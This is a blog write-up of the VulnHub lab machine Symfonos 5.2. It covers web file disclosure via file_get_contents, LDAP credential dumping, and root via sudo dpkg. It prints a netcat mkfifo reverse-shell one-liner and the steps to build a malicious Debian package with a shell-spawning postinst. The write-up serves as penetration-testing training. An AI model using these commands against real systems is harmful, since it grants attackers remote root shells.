WriteUp Symfonos: 5.2

oscp, vulnhub 4 Minutes

This post describe the necessary steps to gain root in Symfonos: 5.2 available on Vulnhub (https://www.vulnhub.com/). This box, according to the autor Zayotic (https://twitter.com/Zayotic), is beginner real life based machine designed to teach people the importance of understanding from the interior.

Console screen from Symfonos: 5.2

MachineRelease Name: Symfonos: 5.2
Resource URL: https://www.vulnhub.com/entry/symfonos-52,415/
Release Data: 2 Mar 2020

Symfonos: 5.2 description from https://www.vulnhub.com/entry/symfonos-52,415/

Summary

To obtain administrative access in this box, the follow kill chain have been executed.

  • Ports and services enumeration.
  • Identified RFI in http://192.168.1.135/home.php?url=
  • Exploiting RFI to dump admin.php revealed credentials to interact with ldap service.
  • Enumeration in the ldap service revealed a clean text password for user zeus.
  • Injected malicious code in debian package and execute with sudo, allowed the attacker to obtained root access.

WriteUp

Recon

During the recon step, the attacker was able to enumerate ports and services in the target machine.

Nmap scan against target machine output

The nikto (https://github.com/sullo/nikto) was used to enumerate the web application running at port 80/TCP provided by Apache HTTPD 2.4.29.

Nikto scan report against web application running in target machine at port 80/TCO

The URL http://192.168.1.135/home.php?url= has a RFI (Remote file Inclusion) vulnerability, allowing the attacker to disclouse files from the system and access files from remote hosts. The home.php use the function file_get_contents, this function do not execute code, all they do is return the raw contents of the file. That could be text, PHP code, binary (e.g. image files), or anything else. No interpretation of the files’ contents is happening at all.

# Function file_get_contents inside home.php.
~$ curl -sq  http://192.168.1.135/home.php?url=home.php
---
if (!empty($_GET["url"]))
{
$r = $_GET["url"];
$result = file_get_contents($r);
}
---
The vulnerability allowed the attacker to obtain the /etc/passwd file

The LFI vulnerability was used to dump the admin.php. This file has credentials in clear text for the ldap service.

admin.php file content revealed user and password for LDAP service.

Exploitation

Once with valid credentials to ldap service, the query for the ldap object revealed the credential. from Zeus user. The crendential can login at web application (http://192.168.1.135/admin.php) and SSH service.

The attacker authenticated with credentials from zeus user through SSH service.

Privilege escalation

Recon routine was executed under the zeus privileges, the routine detected a sudo configuration which allow the user zeus to run the program /usr/bin/dpkg with sudo. This behavior will be abused to obtain a root access. A debian package will be create with malicious code inside and when the zeus run the dpkg with sudo, a reverse shell will reach the attacker machine.

Sudo configuration for zeus user.

In the zeus $HOME directory, has 2 debian packages files.

Debian packages located at /home/zeus/

To extract the debian package (*.deb), the program called dpkg can be used.

zeus@symfonos5:~$ dpkg -x x_1.0_all.deb pack_workdir

Then is necessary to create the directory DEBIAN inside the pack_workdir.

zeus@symfonos5:~$ mkdir pack_workdir/DEBIAN/

Creating the Control file

zeus@symfonos5:~$ cat  pack_workdir/DEBIAN/control 
Package: biffucker
Version: 0
Section: games
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTY Developers <ubuntu-motu@lists.ubuntu.com>
Description: A minesweeper game for Linux

Creating the POSTINST file

zeus@symfonos5:~$ cat  pack_workdir/DEBIAN/postinst 
#!/bin/sh

sh ../pack/x.sh

Both packages x_1.0_all.deb and ame_1.0_amd64.deb located at /home/zeus, has a shellscript inside located at ./pack/x.sh, this script is programmed to execute a revers shell. In this attack, we will edit the file pack_workdir/pack/x.sh and update the Ip Address to the attacker machine.

zeus@symfonos5:~$ cat pack_workdir/pack/x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 5555 >/tmp/f

Now is necessary build the package

zeus@symfonos5:~$ dpkg-deb --build pack_workdir

Then we need to install the package using dpkg to get the reverse shell connecting in the handler.

zeus@symfonos5:~$ sudo dpkg -i --force-overwrite pack_workdir.deb
Reverse shell connect back to the attacker machine under root privileges.

With root privileges, the attacker can get the proof.txt.

Attacker reach the proof.txt file, pwned.

Conclusion

This box is pretty cool, I have learn something new, I don’t knew about the php function file_get_contents. Something cool about this feature is that I can connect to internal services. In this box, for example, I exploit the mod-status using this function. I has spend a while trying to figure out why the remote php code in a txt extension is not running, latter I do some more investigation whith my friends and, finds out that is the function behavior. The ldap is pretty nice to play with, i don’t see much challenges using ldap service btw.

I’m not so sure that the vulnerability related to file_get_contents is a RFI, I look for some papers and I found nothing about this scenario.

Exploiting the RFI vulnerability to redirect the exploit to localhost and hit the mod-status feature because, by default, the apache put the mod_status to run only at local

Resources

Published by Anom

Published

One thought on “WriteUp Symfonos: 5.2

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.